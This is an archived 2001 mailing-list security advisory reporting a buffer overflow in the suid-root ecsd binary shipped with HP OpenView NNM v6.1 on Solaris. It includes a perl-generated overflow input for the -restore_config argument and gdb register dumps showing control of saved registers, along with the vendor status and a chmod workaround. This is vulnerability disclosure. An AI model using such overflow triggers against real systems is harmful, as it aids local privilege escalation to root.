HP OpenView NNM v6.1 buffer overflow The problem.. HP OpenView NNM v6.1 has a buffer overflow in the suid-root file ecsd located in the /opt/OV/bin/ directory. ecsd is not used in NNM, but is shipped and installed suid-root as default. Details.. je@openview~> uname -a SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine je@openview~> ls -la /opt/OV/bin/ecsd -r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd je@openview~> pwd / je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'` Failed to restore engine configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found. je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'` Segmentation fault (core dumped) je@openview~> gdb /opt/OV/bin/ecsd --core=core [snip..] Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'. [snip..] #0 0x28eb8 in main () (gdb) inf reg [snip..] l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0x41410028 1094778920 [snip..] (gdb) Vendor Status.. Hewlett-Packard has been contacted. They are currently working on patches for this vulnerability. Workaround.. chmod -s /opt/OV/bin/ecsd This will remove the setuid bit from /opt/OV/bin/ecsd, therefore if someone does exploit this vulnerability, they won't gain higher privileges. Regards Jonas Eriksson
This archive was generated by hypermail 2b30 : Wed May 23 2001 - 09:55:01 PDT